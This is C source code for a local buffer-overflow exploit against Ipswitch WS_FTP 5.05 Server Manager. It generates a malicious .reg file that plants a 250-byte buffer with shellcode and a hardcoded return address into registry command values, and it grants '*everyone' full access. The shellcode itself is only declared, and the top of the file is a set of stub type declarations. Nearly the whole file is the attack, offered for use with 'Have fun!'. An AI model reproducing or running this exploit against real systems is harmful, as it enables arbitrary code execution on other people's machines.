
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 char* CalcShellcode ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 int strlen (char*) ;

int main(int argc, char* argv[])
{
 FILE* regfile;
 char evilbuff[250];

 printf("[+] Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow\n");
 printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
 if (argc!=3) {
  printf("[+] Usage: %s <Group> <file.reg>\n",argv[0]);
  printf("[+] ex:    %s Marsu Pilami.reg\n",argv[0]);
  return 0;
 }

 memset(evilbuff,'C',250);
 memcpy(evilbuff+4,CalcShellcode,strlen(CalcShellcode));
 memcpy(evilbuff+202,"\x46\xE4\xBD\x7C",4);

 memset(evilbuff+215,0,1);

 regfile=fopen(argv[2],"wb");
 fprintf(regfile,"Windows Registry Editor Version 5.00\r\n\r\n");
 fprintf(regfile,"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Ipswitch\\iFtpSvc\\Domains\\%s\\Commands]\r\n\r\n",argv[1]);
 fprintf(regfile,"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Ipswitch\\iFtpSvc\\Domains\\%s\\Commands\\aa]\r\n\"_Executable\"=\"%s\"\r\n",argv[1],evilbuff);
 fprintf(regfile,"\"_Arguments\"=\"%s\"\r\n",evilbuff);
 fprintf(regfile,"\"*everyone\"=dword:000000ff\r\n\r\n");
 fclose(regfile);
 printf("[+] Done. Have fun!\n");
 return 0;

}
